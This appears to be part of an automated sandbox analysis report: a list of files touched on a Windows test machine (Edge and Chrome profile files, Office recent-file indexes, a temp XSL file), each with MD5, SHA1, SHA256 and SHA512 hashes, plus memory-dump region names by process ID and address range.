SHA256 b9c64afbb94374a4b43c5c347f4ef6cf6bc3a707a2800895904041d0df7ddd81
SHA512 2a2669ecf80b89afd218c8d8b8a17a0edcb45886e3bbad01feef40b59e6c426817bc9af769505093633974c3c334554c681dc8be72dd10085ca6789932953961

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 097fac48893ee64ce5bc54d8ab2bdb05
SHA1 76c39f80804689cd60ff72c86e5853212cec2613
SHA256 9efa17ed289952cfa8e2787a570a003c53d4ccc43404803b5760e7a6a19792df
SHA512 22a2fe85d0ad295d415d4dd6d257d256321b96e29f390d26d6cce5009b5dbcd458c18b5849d538256bc372a1eedee7ef1d365b82a5e5b65bac99e11909939509

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 ee2aabd578c49ab005e47502ba539192
SHA1 41082ab4e2118585f646b79278028ebfb802f99c
SHA256 4774b45522ab86512a1b4d0169b25304b74fbbf38467635dc290aa03472d8b66
SHA512 25cf0ebaf81fa02390d1a9905046693541725773a09e04e74a8adc1f527bd6c9e1c7e71ccba923ebbacb87bb7bd373f757bf703c115f0b45245117ec3ac20e88

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 90a00bf7f1dbbef38d494b07dca6b79f
SHA1 bf960b6375eec7f5a88f3928699c673a8b38d15e
SHA256 910e877b8f2eb8b34c7bdaedca9ddade10bfa6d8ffba0e13f86ad50c2910b3e7
SHA512 95d12fd04a494e753e02465f2d68ca9b3219122bcedcd69e45169cb79f9d3504f11e2888d6633d3402ae447e2eb00963ddcf703b49ebf1f0c7151cf603e0bf3d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fef7fa267e8cea4bfb5d001e76a1d367
SHA1 efccbcc4387ed598dc291ebcd147b553f2044637
SHA256 fca2175756d647df61313457b279137d17eb9270d54a87014a1f56ad4c5929db
SHA512 0ca76ff8a9a22fcbf9a63ae58d4d87d25409fe5fb299273e718c1d25f0397fd123710d0146cd45e69e47bd01795f61bbbb67a1bb219c6b616b4e936c6968d83f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000b3

MD5 c89bb7e6eef00ce36ef70799a9acdb23
SHA1 719e24aca7394d9662296a3c6dc2b7fa66ef5d22
SHA256 c2b01643b56ac25b7efe0395d5434b8ee969f08372a48f88245fc50ae2372efe
SHA512 9f73b775884713de9c9344e45fcef44ab09aecaa83b56a99fd2fe1e572d52ac51315b147150de5f0ad5bf4976a52dd3984438c9d32c2795859f60f63f491d424

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 84879aa82dc03f7f3c7aacb3201a13bb
SHA1 5781e59b3c02bcb35c359b8dc7ddf32d17d199a8
SHA256 78d30652e7d897e161d85cfcfe5a39e20d2dc70374bd4566bc4aebb5e782afea
SHA512 b72555910b23218b736694cdbef96573c7108484ff382b5448665cd5fae4b84e5b0d73d2f509da3feefbb3a8314d24cb30009567fc395c26847d0b8c639a39a8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8fbb703f4b53df0be6e593eaf428a493
SHA1 741e3a7873315d74193531370bb812857d251b9a
SHA256 a967fce9545d019508df3ce23890509f0544c7992accc97e1782dc47e58e521d
SHA512 6bcbb9bfea2391fafe79cc8ea5a95730bc9effab04fca2e494ca87c0eaa533ee5c41a7986fae94c1ef84d8547adf05e79ae123b45724a38b0e0df683c684d3fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000a9

MD5 3b5537dce96f57098998e410b0202920
SHA1 7732b57e4e3bbc122d63f67078efa7cf5f975448
SHA256 a1c54426705d6cef00e0ae98f5ad1615735a31a4e200c3a5835b44266a4a3f88
SHA512 c038c334db3a467a710c624704eb5884fd40314cd57bd2fd154806a59c0be954c414727628d50e41cdfd86f5334ceefcf1363d641b2681c1137651cbbb4fd55d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 41654a2f069909074529d55d800995ac
SHA1 91ac248ef6617eaaf5e82e9947334f6b87f9f7e4
SHA256 5509ea8909f083ae94850633ec23c472cf74d0e6974e69befc7f6ca8d4f59d6c
SHA512 9b9a3b3080ea5cdf084bd2d9a1cdc742eb0e54f9640773bb636d559caa0ca1dbf615ff3384db6b5774a674dc35022fd1037ba344f75ffa9ececf90779d59e95b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000ae

MD5 99042bb81ca1bfdc7b6628b0ddc32053
SHA1 5365a88e946158beece5d12a47f6a3ba04b71d2c
SHA256 5ceb8bfebdcc56d633361c9ac9e55967e51343b2e0af777fc40455693e7ea7a0
SHA512 ddf134850fb433ac87209e29b3163ab947c268ea5c479144779a37a723c10fc4a762542f037006fcafd451dbf652fdfa3a9af0c566153597b7aadac575eeb15f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9561c61545c1ea7bdb63763d8c986479
SHA1 565337c18b179d8140e338cc27e71aa36a504d6f
SHA256 84ed5c89789c188c5bd0a8deb3b5af820bbbe941220ee95890b040a86d227d02
SHA512 4abd2f2b87b3728e08e369fca650c9b3f729eb8b8c8482c96bd74e160de404283bbe57df2a907b968f29eeb173a770be1fae2178a09a05c5d4fe7a106dbde45e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000ac

MD5 888c5fa4504182a0224b264a1fda0e73
SHA1 65f058a7dead59a8063362241865526eb0148f16
SHA256 7d757e510b1f0c4d44fd98cc0121da8ca4f44793f8583debdef300fb1dbd3715
SHA512 1c165b9cf4687ff94a73f53624f00da24c5452a32c72f8f75257a7501bd450bff1becdc959c9c7536059e93eb87f2c022e313f145a41175e0b8663274ae6cc36

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000b1

MD5 b15db15f746f29ffa02638cb455b8ec0
SHA1 75a88815c47a249eadb5f0edc1675957f860cca7
SHA256 7f4d3fd0a705dbf8403298aad91d5de6972e6b5d536068eba8b24954a5a0a8c7
SHA512 84e621ac534c416cf13880059d76ce842fa74bb433a274aa5d106adbda20354fa5ed751ed1d13d0c393d54ceb37fe8dbd2f653e4cb791e9f9d3d2a50a250b05f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 6c2a6aab62b007d047862fb6948e4b82
SHA1 40f5f019751687a33be5674f3d6089e578829039
SHA256 25a31d58b22be3b2fbda4e79481cdbaa8e68fcffaffceddf547c97971d4199c9
SHA512 1f793b6a23e0172e23298cec678629d7e026e36f65e66606929c360f8a84a08c3f61880f9ec9c95e9b7ef30bd8215fa3df2f08a96687d9ff924e945529ece013

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2582fbc7dc482f39f353cf8c0e18b39a
SHA1 92cb951fbd60397a19ab7e43981794a8285fa49f
SHA256 669d5457f0fb57f3c2849e5df548d5271df08b5953a4ea5b4d7817742d3cdfa8
SHA512 8de2d96d66b7e6e474bdcb66a6c431a2e3fe42370856d0d96976ca2322c2becf7b31e687061f82b8e4964cc4b77d80abfec396c117c7037a4f6e21c726d01357

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5ead9db651f7827904b3dcfa07e40868
SHA1 24f7acc98fc8e923829268cad7a9370b7f09475a
SHA256 07ac9c1b034f4083f38913df8c5cd34dc55bb2897306d6d1062ee6074d2d9c0a
SHA512 ccafe87de2d93083c6a4fe9eaee318cb6ad6a225bcb13ed3b8b3b206941ddba164445fe0fc3a4ba225b8a5684c595800b9bfce8bc4ad3f9db8f39fca17a397fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 01dee20e897ee785423ac7bb3392c174
SHA1 044ad78b9b543982cc638821ee2f77b386b0a666
SHA256 5fc3576c289fdb8384c885c423ef92fb413318705b6c4936ebab76844ab327f0
SHA512 80bd59d66225d0fcbe664f290d6aeea4b429bcab93ffb31d34748a29b298b40ba4e7f971cd40fe43104b6c1b344ecbb322f8e56c6761c7e2820a0e5a1404f709

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 5d11d9bf1dbed6f1f4532988eff2669a
SHA1 6df6f5b6fbdbee05712b775375e2532d70dfe362
SHA256 d174592d677c7c53fa417f7849577d45f26b4f95535d10b8e159579bd73e256b
SHA512 dc757e58a44e3eb977bbb554868ba967be91f58c1e62956dfc4b1c7ec25da24de5e18e1d8ed907c57e59d942d531700d6194aa03a0a321827d866ed91b2d0d2e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 42547ccd74a425cbba057cc0182c2a23
SHA1 0d20d9023f7840349a305a27d94e43de6c7e5748
SHA256 6b03a9d3aa7245563e167a81671bdff400cba844580b3dbcb4392b8d85168c8a
SHA512 48fdf28e5d600fdc4312b0b465698e8ac6bdb03cd410aa8d84ad57f8c5112d814d6db82f8a6c9e04b2bb7bc185daf0f0d6914cbff8c9fb1363f3b2adce6251e3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 5aab2a162f10e9f30212597ecd662d8e
SHA1 af4ab6b5cfc1e68adfa834e394318cf6210cd345
SHA256 1ac93d8d23cfa38a50cf3ce4ed79a263f7e206a2789e4649c9898a2be2522b51
SHA512 298ec6b979d27009bb9da193a6f51e6d69c950c42fd253d54ac71614263196227cc5a7d7dce0699060b05a4afd11c417e61fdac8641e0afe1dc8100061b49a8c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 212af0cebe57530108bdafe477a6575a
SHA1 7d738d8fc0a8559b439403a86d319ebf1219dc94
SHA256 704f950b23c7d5ea528be616df892135bc38e977d4a98c6936e8eeca64ebfcea
SHA512 df23ad83f2f455e866694c7fb69347e86f01b634a8847e39c01bf766b5811584df6e8db7ed9cbe664807cc428f7fdaf043b0d213c595dab11b0e336e8dbc74e5

memory/5336-2171-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5336-2173-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5336-2175-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5336-2172-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5336-2174-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5336-2176-0x00007FFB0B9B0000-0x00007FFB0B9C0000-memory.dmp

memory/5336-2177-0x00007FFB0B9B0000-0x00007FFB0B9C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 6659c0f91ddd118fac1235120d5670aa
SHA1 efcf7ecc4c5943e3af753890c26226c69760ff74
SHA256 e27dc5d531458fe7979f2bcc64220ee6246a647e18b957d04aa47054cadedcb3
SHA512 801e5052f3679152be8d13b736c251584f3779ed807614963abf833cacbf1b2c3d6d650d63d23f0417d647c07af158a255d41db7acfe5e9698f0292f0f5e765a

memory/5336-2230-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5336-2232-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5336-2231-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5336-2229-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 660fd451e2b14c931583d9050d1f3c3c
SHA1 7e0297ca59ba751bd691ca586b01507d7d0bb769
SHA256 3f0febd8ebfe204913f7278f99b259d69cc3b5a0b62d27efc6d598827f88258e
SHA512 e88a29553172eee51ee4b2738cbfd4a19b5369e1fce92081c3c98f1aae45583b5f31b7d49339f16a2a887f9199ab92b02d90235d61957e713f343f579523289b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2a097f3bc73b2df5ed61b791e547a17a
SHA1 39a43bc045a2a4238de78e74f8101c88b1f2f9c0
SHA256 7845dcf4f9c7d1ea908bbbb936408e8af25980514b51ecfd33cbeb4a17c46c4e
SHA512 28cc846ad3213eb290cb2ba533996f03432d9c4046b6852390402d8a4a240814baaa53ae3ef255ca5014d5e977c02f4141a99c0387150946880f8b2f5baaad05

memory/4724-2352-0x0000000000CB0000-0x0000000000CC2000-memory.dmp

memory/4724-2353-0x0000000005600000-0x0000000005666000-memory.dmp

memory/4724-2354-0x0000000005B00000-0x0000000005B9C000-memory.dmp

memory/4724-2355-0x0000000005A60000-0x0000000005AA0000-memory.dmp

memory/3324-2361-0x0000000006190000-0x0000000006292000-memory.dmp

memory/5176-2362-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5176-2364-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5176-2363-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5176-2365-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5176-2366-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5176-2367-0x00007FFB0B9B0000-0x00007FFB0B9C0000-memory.dmp

memory/5176-2368-0x00007FFB0B9B0000-0x00007FFB0B9C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 66a0327ba4cf03fb370fba56ff40cfa6
SHA1 0ca235abf1e8afa8ce97a1c8578758fd141db33f
SHA256 051bdf2afdd582b61075e505a26fafea2d9bc99c2b740ee326f278755f30526b
SHA512 fb1fe1f3d3041c0653e7c8dc6ee0692d8bdd98c25fa79db780c2a5945c00a53160db867a878d49c6e7238425bef9b8f50ca4cf1c3b1e65d8e576dcf87371733c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 51a74b2f766fbd1a880968d29ec18b3f
SHA1 27f57a8b0f3b002a74eaec3aa6207c74980d1ce3
SHA256 5b01639434e27fd4558b6bc73d54597f95b5befb4179723ee7710fe242e15e85
SHA512 c035f5aed1f5e965cb9bb637e0339102bfed345d92730dc37b53cabf18e8f18525b3c30e2b524344f71f0256874f66f5a925a7a15c16bde0d00d1a30b94a68fa

C:\Users\Admin\AppData\Local\Temp\TCD92CD.tmp\sist02.xsl

MD5 f883b260a8d67082ea895c14bf56dd56
SHA1 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256 ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512 d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

memory/5176-2843-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5176-2844-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5176-2845-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/5176-2842-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/2184-2846-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp

memory/2184-2848-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp

memory/2184-2847-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp

memory/2184-2852-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp

memory/2184-2853-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp

memory/2184-2858-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp

memory/2184-2857-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp

memory/2184-2856-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp

memory/2184-2855-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp

memory/2184-2854-0x0000021DC67E0000-0x0000021DC67E1000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\8c5c12da-b70b-4c00-98fb-d7c15e421822.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 55588d8b11009b19f183e78a9d31035a
SHA1 214bef840662f3d5e7bfddcdf767ef301fbebccf
SHA256 82c27004db19412e101c753f3a2e941a7148837cc6dfc444029cca398bff5d98
SHA512 d5a6bff9530526e9bae9fb44af0c180558cd33c1aeab070ff265beaaaa802c6cebb5d20ca16536477255dac7633a05a0942f91ee90377cd02122c4998337269f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 6dc798612bceeb491dfa22e8224db2d9
SHA1 b5ca6b5310d2a734c62152042857a4c099b82963
SHA256 6f69c0e744c654d69e8420003cd14adeee8a8edab0d55c9d596abe3507b738e5
SHA512 c2c18cd124ee798550cee507cb96ec40a55df2b17b55f461a088079c1e2ba66e074d54824b234916c5a1227d08908bbf2183d21ebdbdb4b6eba9ef0a48575b56

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 882b0eda3668deb4e9c04274db65bb36
SHA1 84f8d1d008735aac1e616c9ddf6cb30f4f9981a2
SHA256 9e8492f6e168088c1614088cd7ff3e8db2ca7e24d2bce5cc8acebde69bc401ea
SHA512 3bf1b9cc306c79b3fa02093fa2323d92b18fe6a11b3c74577da71c0cfbf3a7512de315fbd1a9f74bb9b3e08d5428edda809bc8429d5e5f053ac7b325e59764d2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 8596001236ac7b62382a47a2a0548bcf
SHA1 cd480cf2fb7c5952f001f57ecf1be9643e1ee638
SHA256 cedd352b52db62a3b0a90094c8a001a9e855b6c325b036f2bc93d90cdfa054a2
SHA512 646939986fa279183d80acb4967f671e83d44ceb3966acd4ec4c87f5afc6685d10ef9bf5598ecc55ff229cd5e1d78d060e1c8a830ebc80b534e788f52a44342c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

MD5 c594a826934b9505d591d0f7a7df80b7
SHA1 c04b8637e686f71f3fc46a29a86346ba9b04ae18
SHA256 e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610
SHA512 04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

MD5 3e552d017d45f8fd93b94cfc86f842f2
SHA1 dbeebe83854328e2575ff67259e3fb6704b17a47
SHA256 27d9c4613df7a3c04da0b79c13217aa69992b441acb7e44bf2a7578ca87d97d6
SHA512 e616436f2f15615429c7c5c37de3990c3e86c5e1da7d75a0f524fc458b75d44a5be1a3648a628d63e1cf8aa062e08b538f2f2bc9c6a0b42157beb24f82c571d9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 394b7cf96b44c1882e00ac40f52462e8
SHA1 a8042ffeeae5216363ee5f271519ef9b23fdf8b9
SHA256 a31f5c1f0cf980bb3fbe02c45043384e88dccf17e2aa66895558e49589aeb5cc
SHA512 db635803b4771fe433cc5ecf4b9526b655add108657da826c04def6a1308fb2eef9540188126e2a839b078b96c02356025b1e2b783654c747cd649331928531d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 8c248deb636a3cf06766e063893b80dc
SHA1 fa7472c4476271d1269c47fd91075d6218f2673b
SHA256 13a70ab0497f4452ab5b83d2943d857c6f97bc3e4e7fde26e2265a7327fb15f2
SHA512 a0f6423ebe8d437419849ea42a06597b0f2150819792aad5eff497eb294f817c9f088f217dde0088589121a4ae75644a3061f302f63ee2a3f200fe24779edc27

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 810ef7316a212b8bd5312f4ff0bf70b5
SHA1 549fd39a3eeac04bc249ad356b4639fce296666f
SHA256 ca684bf4497fa91abbddefc5a6c0a500b8f641f4418beb8610dc2fa677eaac55
SHA512 20b8aeff1ecaac814e776e2e6b79b6637e7329636ff4b68d78441d34d37ee6f7baed096d91d19aefcea16ab2227b6fbe6ac63df10ae49e454043f5babec423a4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 ecb8db40ae8c6a3ff764ba48acc89c78
SHA1 a30dafc2e1c6e42e1b28b9a4ffb1804fc0cf2436
SHA256 76d0e28d41cf4a926aed9e7d4ba9865297a6d017f94622eaf7cfe55ed5b660be
SHA512 a8554daf9c4fb14571e33d0453b6a45f72113179f77d1dcb671707f42a441079b4c48c61425b51d18540a587e4dcf769b798109e4350316460d43752b93bf1aa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 bae164fcaf40542f721a7b1084cbb144
SHA1 f727e9ba5a106f77be1ca3685ef6706bc00b32ba
SHA256 8a0f63c5974c87c8689a70202ec4eac7f7024affe56ddb49844c4e94ed6a3c6b
SHA512 be7ebf0016f8d553afaa360652d6cfad0785a82c3c42ca6014efb143a3c619aa8f67bac702e68d182bc71f5482701a59685f5d0a96f6617e34812fe9cc73c38e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 5e4494cca55bec01872a3c49ced808d6
SHA1 d0fc5475b6891104d3df7f503c208add977fddad
SHA256 c9d7f4070ed9641ef0469ffbd604f21d93727592f3f1960b73c6c30f70948902
SHA512 d4129ebbbe12c7ea6dbd150cc0896f4f923331b44bd2e200bccffad1284bf14be68c007dd663758bf06be610502289203464e3fa1ef9501a81fc39220fc75b5a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

memory/3116-3177-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/3116-3179-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/3116-3178-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/3116-3180-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

memory/3116-3181-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 7a699530e4b7784c7b2e5e3ded5ef279
SHA1 f4a93e4e552f1e9bba2524d89c116366fa44fffc
SHA256 5000e2e9680de9d2295a8cc8805c094e28b2d6d1f8d39dda831df2b194d30c24
SHA512 e772270ad7fb9514c6e5d5b8b78d9ff010cd67b7b279a5f485df9005c371e0bcc85e6551c6c03c7691f7f3e9750335e540c632fc3e99f9904ce2bdf8a4710f8a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 182019040531705b8a741656825def9c
SHA1 d659414b2dd65a0d535415a851c3d0f2b1ee30d9
SHA256 c05ac0dddefd90d116a1438008ac4aebe1ac811bad096d1e8f465e4563b4f6ee
SHA512 4716a208e33604aab320cbf220fa09390d6a35b865d5a89ec0ff2e122bde3959099ee494701b4b9a39b4a275cca0a392d2d47abec5d12c951dde0533ba9d198c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 5adf33653978d4aa3ec36cf9c891362c
SHA1 0604e46191c6077e35b4f359d101f4f2876aca82
SHA256 cf84e13e9338926dc3d49ec735c5979499bda9191d384ec89e39371d1645b390
SHA512 e37ea5cb7edbace8fe1ce2890449e04578e59b7518e568a5d79cf03c2a9f43f28903e32fcaa5bd97545695185aa1c3d5982f3ec234c06740c600465be5c1100f